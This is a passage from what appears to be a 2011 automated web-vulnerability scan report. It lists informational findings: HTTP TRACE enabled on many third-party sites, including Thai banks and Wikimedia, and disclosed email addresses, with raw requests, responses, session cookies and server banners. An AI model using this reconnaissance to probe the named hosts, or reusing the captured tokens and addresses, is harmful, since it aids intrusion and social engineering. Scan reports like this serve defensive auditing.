Date: Tue, 03 May 2011 13:23:46 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: jquery.com
Cookie: 4137f4a4ded4a140


25.13. http://jquery.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jquery.org
Path:   /

Request

TRACE / HTTP/1.0
Host: jquery.org
Cookie: a62bad234ceec254

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:23:59 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: jquery.org
Cookie: a62bad234ceec254


25.14. https://ksupplychain.kasikornbank.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ksupplychain.kasikornbank.com
Path:   /

Request

TRACE / HTTP/1.0
Host: ksupplychain.kasikornbank.com
Cookie: d6a0886c15b65613

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 03 May 2011 12:54:32 GMT
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: ksupplychain.kasikornbank.com
Cookie: d6a0886c15b65613


25.15. http://meta.wikimedia.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /

Request

TRACE / HTTP/1.0
Host: meta.wikimedia.org
Cookie: 2c8b1a27c63ee62e

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 11:44:17 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from sq66.wikimedia.org
X-Cache-Lookup: NONE from sq66.wikimedia.org:3128
X-Cache: MISS from sq65.wikimedia.org
X-Cache-Lookup: NONE from sq65.wikimedia.org:80
Connection: close

TRACE / HTTP/1.0
Host: meta.wikimedia.org
Cookie: 2c8b1a27c63ee62e
Via: 1.0 sq66.wikimedia.org:3128 (squid/2.7.STABLE7)
X-Forwarded-For: 173.193.214.243, 208.80.152.75


25.16. http://metrics.seenon.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.seenon.com
Path:   /

Request

TRACE / HTTP/1.0
Host: metrics.seenon.com
Cookie: 85de87eb2ca737a

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:33:23 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: metrics.seenon.com
Cookie: 85de87eb2ca737a
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.17. http://mls.marchex.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mls.marchex.com
Path:   /

Request

TRACE / HTTP/1.0
Host: mls.marchex.com
Cookie: 46f2ca7ca5eb7d31

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:23:38 GMT
Server: Apache/2.2.9 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: mls.marchex.com
Cookie: 46f2ca7ca5eb7d31
Connection: Keep-Alive
X-Client-IP: 173.193.214.243


25.18. https://online.kasikornbankgroup.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.kasikornbankgroup.com
Path:   /

Request

TRACE / HTTP/1.0
Host: online.kasikornbankgroup.com
Cookie: 7cd275fb11753f06

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:52:19 GMT
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: online.kasikornbankgroup.com
Cookie: 7cd275fb11753f06


25.19. http://picasaweb.google.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://picasaweb.google.com
Path:   /

Request

TRACE / HTTP/1.0
Host: picasaweb.google.com
Cookie: d5d635ecdf0ece90

Response

HTTP/1.0 200 OK
Expires: Tue, 03 May 2011 13:23:21 GMT
Date: Tue, 03 May 2011 13:23:21 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=GcKGa8CDr2OY; Path=/; HttpOnly
Set-Cookie: S=photos_html=DvYogS5NMC2clBDPE05OOQ; Domain=.google.com; Path=/; HttpOnly
Content-Type: message/http; charset=UTF-8
Content-Length: 466
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

TRACE /errors/405 HTTP/1.1
Host: picasaweb.google.com
Cookie: d5d635ecdf0ece90
X-Google-GFE-Frontline-Info: vip=72.14.204.91,server_port=80,client_port=35379,tcp_connection_request_count=0,header_order=HC,rtt=4,client_protocol=HTTP/1.0
X-Google-GFE-Can-Retry: yes
X-User-IP: 1
...[SNIP]...

25.20. http://piwik.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://piwik.org
Path:   /

Request

TRACE / HTTP/1.0
Host: piwik.org
Cookie: df6503f85474af44

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:00 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: piwik.org
Cookie: df6503f85474af44


25.21. http://plugins.jquery.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://plugins.jquery.com
Path:   /

Request

TRACE / HTTP/1.0
Host: plugins.jquery.com
Cookie: 4498761b80db8702

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:24:48 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: plugins.jquery.com
Cookie: 4498761b80db8702


25.22. http://register2.set.or.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://register2.set.or.th
Path:   /

Request

TRACE / HTTP/1.0
Host: register2.set.or.th
Cookie: 18319d3c86cb566d

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 03 May 2011 13:32:59 GMT
X-Powered-By: ASP.NET
Content-Type: message/http
Content-Length: 73

TRACE / HTTP/1.0
Host: register2.set.or.th
Cookie: 18319d3c86cb566d


25.23. http://rtradeinfo.bualuang.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rtradeinfo.bualuang.co.th
Path:   /

Request

TRACE / HTTP/1.0
Host: rtradeinfo.bualuang.co.th
Cookie: dcd39ccd3aa85a46

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:44:52 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: dcd39ccd3aa85a46
Host: rtradeinfo.bualuang.co.th


25.24. http://scriptlogiccorp.d2.sc.omtrdc.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://scriptlogiccorp.d2.sc.omtrdc.net
Path:   /

Request

TRACE / HTTP/1.0
Host: scriptlogiccorp.d2.sc.omtrdc.net
Cookie: e6633a0ee4dfa744

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:43:23 GMT
Server: Omniture DC/2.0.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: scriptlogiccorp.d2.sc.omtrdc.net
Cookie: e6633a0ee4dfa744
Connection: Keep-Alive
X-Forwarded-For: 173.193.214.243


25.25. https://secure.wikimedia.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.wikimedia.org
Path:   /

Request

TRACE / HTTP/1.0
Host: secure.wikimedia.org
Cookie: 78be834a4950e608

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:54:21 GMT
Server: Apache
Content-Type: message/http
Via: 1.0 secure.wikimedia.org
Connection: close

TRACE / HTTP/1.1
Host: secure.wikimedia.org
Cookie: 78be834a4950e608
Via: 1.0 secure.wikimedia.org
X-Forwarded-For: 173.193.214.243
X-Forwarded-Host: secure.wikimedia.org
X-Forwarded-Server: secure.wikimedia.org
Connection: Keep-Alive


25.26. http://sizzlejs.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sizzlejs.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sizzlejs.com
Cookie: ce6ec3aee5bdfc37

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:25:52 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sizzlejs.com
Cookie: ce6ec3aee5bdfc37


25.27. http://th.wikipedia.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://th.wikipedia.org
Path:   /

Request

TRACE / HTTP/1.0
Host: th.wikipedia.org
Cookie: 6d5ee1fd5d68f2e8

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:27:14 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from sq75.wikimedia.org
X-Cache-Lookup: NONE from sq75.wikimedia.org:3128
X-Cache: MISS from sq76.wikimedia.org
X-Cache-Lookup: NONE from sq76.wikimedia.org:80
Connection: close

TRACE / HTTP/1.0
Host: th.wikipedia.org
Cookie: 6d5ee1fd5d68f2e8
Via: 1.0 sq75.wikimedia.org:3128 (squid/2.7.STABLE7)
X-Forwarded-For: 173.193.214.243, 208.80.152.86


25.28. http://thailandforvisitors.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://thailandforvisitors.com
Path:   /

Request

TRACE / HTTP/1.0
Host: thailandforvisitors.com
Cookie: e564412805eb30f6

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:28 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: thailandforvisitors.com
Cookie: e564412805eb30f6


25.29. http://trends.atipat.co.cc/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trends.atipat.co.cc
Path:   /

Request

TRACE / HTTP/1.0
Host: trends.atipat.co.cc
Cookie: 561706f1e4bac89e

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:44 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: trends.atipat.co.cc
Cookie: 561706f1e4bac89e


25.30. http://validator.w3.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://validator.w3.org
Path:   /

Request

TRACE / HTTP/1.0
Host: validator.w3.org
Cookie: 5184a1bb444c00e1

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:28:04 GMT
Server: Apache/2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: validator.w3.org
Cookie: 5184a1bb444c00e1


25.31. http://wiki.answers.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wiki.answers.com
Path:   /

Request

TRACE / HTTP/1.0
Host: wiki.answers.com
Cookie: f8afd56e5a2dd52d

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:29:12 GMT
Server: Apache
Vary: X-Varnish,X-CLIENTIP,Host
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: wiki.answers.com
Cookie: f8afd56e5a2dd52d
Connection: Keep-Alive
X-AnsW-rEAl-HosT: 173.193.214.243
X-CLIENTIP: 173.193.214.243
X-ORIG-URL: /
X-Varnish: 771201355


25.32. http://wikimediafoundation.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wikimediafoundation.org
Path:   /

Request

TRACE / HTTP/1.0
Host: wikimediafoundation.org
Cookie: 7885fb390f5d0ec5

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:29:08 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from sq63.wikimedia.org
X-Cache-Lookup: NONE from sq63.wikimedia.org:3128
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: NONE from sq73.wikimedia.org:80
Connection: close

TRACE / HTTP/1.0
Host: wikimediafoundation.org
Cookie: 7885fb390f5d0ec5
Via: 1.0 sq63.wikimedia.org:3128 (squid/2.7.STABLE7)
X-Forwarded-For: 173.193.214.243, 208.80.152.83


25.33. http://wuu.wikipedia.org/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://wuu.wikipedia.org
Path:   /

Request

TRACE / HTTP/1.0
Host: wuu.wikipedia.org
Cookie: abc8b2e658510516

Response

HTTP/1.0 200 OK
Date: Tue, 03 May 2011 13:29:11 GMT
Server: Apache
Content-Type: message/http
X-Cache: MISS from sq75.wikimedia.org
X-Cache-Lookup: NONE from sq75.wikimedia.org:3128
X-Cache: MISS from sq66.wikimedia.org
X-Cache-Lookup: NONE from sq66.wikimedia.org:80
Connection: close

TRACE / HTTP/1.0
Host: wuu.wikipedia.org
Cookie: abc8b2e658510516
Via: 1.0 sq75.wikimedia.org:3128 (squid/2.7.STABLE7)
X-Forwarded-For: 173.193.214.243, 208.80.152.76


25.34. http://www.1day1year.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.1day1year.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.1day1year.com
Cookie: 58b48e6522099201

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:27:13 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.1day1year.com
Cookie: 58b48e6522099201


25.35. http://www.bangkokpost.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bangkokpost.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.bangkokpost.com
Cookie: 53658b02fe801c02

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:38:03 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.bangkokpost.com
Cookie: 53658b02fe801c02


25.36. http://www.coolthaihouse.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.coolthaihouse.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.coolthaihouse.com
Cookie: 3fb3d9b1c5ae35ab

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:37:28 GMT
Server: Apache/2.2.9 (Linux/SUSE)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.coolthaihouse.com
Cookie: 3fb3d9b1c5ae35ab


25.37. http://www.formlessnetworking.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.formlessnetworking.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.formlessnetworking.com
Cookie: ecfe97d3751ee802

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:42:03 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.formlessnetworking.com
Cookie: ecfe97d3751ee802


25.38. http://www.ktam.co.th/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ktam.co.th
Path:   /

Request

TRACE / HTTP/1.0
Host: www.ktam.co.th
Cookie: 20bd59cc40c573d7

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:18 GMT
Server: Apache/1.3.39 (Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.30 OpenSSL/0.9.7a PHP-CGI/0.1b
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 20bd59cc40c573d7
Host: www.ktam.co.th


25.39. http://www.thailandguru.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thailandguru.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thailandguru.com
Cookie: 117f1c8f02a2188

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:30:05 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.thailandguru.com
Cookie: 117f1c8f02a2188


25.40. http://www.thailandhotelforums.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.thailandhotelforums.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.thailandhotelforums.com
Cookie: abb3fe66af0716ce

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:34:11 GMT
Server: Apache/1.3.42 (Unix) PHP/5.2.17 with Suhosin-Patch
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: abb3fe66af0716ce
Host: www.thailandhotelforums.com


25.41. http://www2.itt-tech.edu/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.itt-tech.edu
Path:   /

Request

TRACE / HTTP/1.0
Host: www2.itt-tech.edu
Cookie: b142add5b5e64aec

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:35:50 GMT
Server: Apache/2.0.55 (Unix) JRun/4.0
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www2.itt-tech.edu
Cookie: b142add5b5e64aec


26. Email addresses disclosed  previous  next
There are 101 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


26.1. http://419.myfunforum.org/sutra724.php/x22  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://419.myfunforum.org
Path:   /sutra724.php/x22

Issue detail

The following email addresses were disclosed in the response:

Request

GET /sutra724.php/x22 HTTP/1.1
Host: 419.myfunforum.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:15:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.16
Set-Cookie: cc=US
Set-Cookie: phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6%3A%22userid%22%3Bi%3A-1%3B%7D; expires=Wed, 02-May-2012 13:15:09 GMT; path=/
Set-Cookie: phpbb2mysql_sid=271a141b4d0506677d3717c256a38e75; path=/
Cache-Control: no-cache, pre-check=0, post-check=0
Expires: 0
Pragma: no-cache
Content-Type: text/html
Connection: close
Content-Length: 30928

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html dir="ltr">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Content-Style-Type" c
...[SNIP]...
<title>Warning: These are internet scams :: Kasikorn Bank Of Thailand &lt;kasikorn@info.al&gt;</title>
...[SNIP]...
<a class="maintitle" href="ftopic687-0-0-asc-.php">Kasikorn Bank Of Thailand &lt;kasikorn@info.al&gt;</a>
...[SNIP]...
</span>&nbsp; &nbsp;Post subject: Kasikorn Bank Of Thailand &lt;kasikorn@info.al&gt;</span>
...[SNIP]...
<br />
&lt;kasikorn@info.al&gt;    Wed, Dec 22, 2010 at 11:59 AM
<br />
...[SNIP]...
<a href="mailto:kkassykorn@yahoo.co.jp">kkassykorn@yahoo.co.jp</a>
...[SNIP]...
<a href="mailto:scams.tk@gmail.com">
...[SNIP]...

26.2. http://adomas.org/javascript-mouse-wheel/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adomas.org
Path:   /javascript-mouse-wheel/

Issue detail

The following email address was disclosed in the response:

Request

GET /javascript-mouse-wheel/ HTTP/1.1
Host: adomas.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 03 May 2011 13:07:53 GMT
Content-Type: text/html
Content-Length: 13850
Last-Modified: Tue, 20 Oct 2009 19:28:11 GMT
Connection: close
Accept-Ranges: bytes

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US">
<head>
<title>Mouse wheel programming in JavaScript</title>
   <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
   <me
...[SNIP]...
<a href="mailto:adomas.paltanavicius@gmail.com">
...[SNIP]...

26.3. http://en.wikipedia.org/w/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://en.wikipedia.org
Path:   /w/index.php

Issue detail

The following email address was disclosed in the response:

Request

GET /w/index.php?title=MediaWiki:JQuery-makeCollapsible.js&action=raw&ctype=text/javascript HTTP/1.1
Host: en.wikipedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: clicktracking-session=Azl5D3ckV95i4uJietKetOWelKAgEVii3

Response

HTTP/1.0 200 OK
Server: Apache
Cache-Control: public, s-maxage=300, max-age=2678400
Vary: Accept-Encoding
Date: Tue, 03 May 2011 11:44:09 GMT
Content-Type: text/javascript; charset=UTF-8
Last-Modified: Sat, 05 Mar 2011 19:19:59 GMT
X-Cache: HIT from sq59.wikimedia.org
X-Cache-Lookup: HIT from sq59.wikimedia.org:3128
Age: 7
X-Cache: HIT from sq40.wikimedia.org
X-Cache-Lookup: HIT from sq40.wikimedia.org:80
Connection: keep-alive
Content-Length: 12408

// Documentation/Examples: [[mw:RL/DM#jQuery.makeCollapsible]]
/* http://svn.wikimedia.org/viewvc/mediawiki/trunk/phase3/resources/jquery/jquery.makeCollapsible.js?view=markup&pathrev=83309 */

/**
*
...[SNIP]...
<krinklemail@gmail.com>
...[SNIP]...

26.4. http://investors.fiserv.com/releasedetail.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://investors.fiserv.com
Path:   /releasedetail.cfm

Issue detail

The following email address was disclosed in the response:

Request

GET /releasedetail.cfm HTTP/1.1
Host: investors.fiserv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Variable RELEASEID is undefined.
Connection: close
Date: Tue, 03 May 2011 13:24:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
server-error: true
Content-Type: text/html; charset=UTF-8

<html>
<head>
<style type="text/css">
<!--
html, body, p {font-family: arial, helvetical, sans-serif;font-size: 12px;}
h1 {font-size: 14px;}
-->
</style>

<script language="Javascript">

   
...[SNIP]...
<a href=\"mailto:webmaster@shareholder.com?subject=" + escape("Error on page ") + document.location.host + escape("/releasedetail.cfm") + "&body=%0D%0A%0D%0A%0D%0AQueryString:%20" + escape(location.search) + "%0D%0AReferring%20Page:%20" + esca
...[SNIP]...

26.5. http://jqueryui.com/about  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /about

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Tue, 03 May 2011 13:24:13 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15514

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

26.6. http://marketdata.set.or.th/scripts/JSCookMenu.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://marketdata.set.or.th
Path:   /scripts/JSCookMenu.js

Issue detail

The following email addresses were disclosed in the response:

Request

GET /scripts/JSCookMenu.js HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://marketdata.set.or.th/mkt/topten.do?language=en&country=US
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); visit_time=96

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:59:45 GMT
Server: Apache
Last-Modified: Wed, 09 Jun 2010 09:51:47 GMT
ETag: "61c375-adb6-daab32c0"
Accept-Ranges: bytes
Content-Length: 44470
Content-Type: application/x-javascript

/*
   JSCookMenu v2.0.4 (c) Copyright 2002-2006 by Heng Yuan

   http://jscook.sourceforge.net/JSCookMenu/

   Permission is hereby granted, free of charge, to any person obtaining a
   copy of this sof
...[SNIP]...
<georg@lonux.de>
...[SNIP]...
<Burton@ntopsupport.com>
...[SNIP]...
<felix@bebinary.com>
...[SNIP]...
<anders@netspace.net.au>
...[SNIP]...
<dick@netrex.nl>
...[SNIP]...

26.7. http://moneytalk.scb.co.th/Scripts/jquery.mousewheel.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://moneytalk.scb.co.th
Path:   /Scripts/jquery.mousewheel.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Scripts/jquery.mousewheel.js HTTP/1.1
Host: moneytalk.scb.co.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://moneytalk.scb.co.th/index.asp?FileName=TH&1=1
Cookie: _uid8098=FB330C07.1; __utma=37298082.359090507.1304444124.1304444124.1304444124.1; __utmz=37298082.1304444124.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); visit_time=12324; ASPSESSIONIDSQTQRTAB=EJOJLEJDNJCJDOIGAOKIKFEP; ASPSESSIONIDQSSRQSAA=GOGFIDBAAKJCHLGGCNKPGDDG

Response

HTTP/1.1 200 OK
Content-Length: 2412
Content-Type: application/x-javascript
Content-Location: http://moneytalk.scb.co.th/Scripts/jquery.mousewheel.js
Last-Modified: Wed, 03 Dec 2008 14:05:44 GMT
Accept-Ranges: bytes
ETag: "06c743b5055c91:52f"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 18:03:55 GMT

/* Copyright (c) 2006 Brandon Aaron (brandon.aaron@gmail.com || http://brandonaaron.net)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
* Thanks to:
...[SNIP]...

26.8. http://nerdbots.com/contact.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://nerdbots.com
Path:   /contact.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /contact.aspx HTTP/1.1
Host: nerdbots.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://nerdbots.com/services/tuneup.html
Cookie: __utma=39949757.754194945.1304447519.1304447519.1304447519.1; __utmb=39949757.4.10.1304447519; __utmc=39949757; __utmz=39949757.1304447519.1.1.utmgclid=CL2Qyszyy6gCFYFM5QodqHBPqQ|utmccn=(not%20set)|utmcmd=(not%20set)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 13:45:08 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14841


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" c
...[SNIP]...
<a href="mailto:support@nerdbots.com">support@nerdbots.com</a>
...[SNIP]...

26.9. https://online.kasikornbankgroup.com/K-Online/ksec/K-CyberTrade-login.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://online.kasikornbankgroup.com
Path:   /K-Online/ksec/K-CyberTrade-login.jsp

Issue detail

The following email address was disclosed in the response:

Request

GET /K-Online/ksec/K-CyberTrade-login.jsp HTTP/1.1
Host: online.kasikornbankgroup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 12:53:38 GMT
Content-Length: 10641
Set-Cookie: JSESSIONID=0001EidkyFV5kaz-4tiOC5P_auE:-1JC3VU2; Path=/
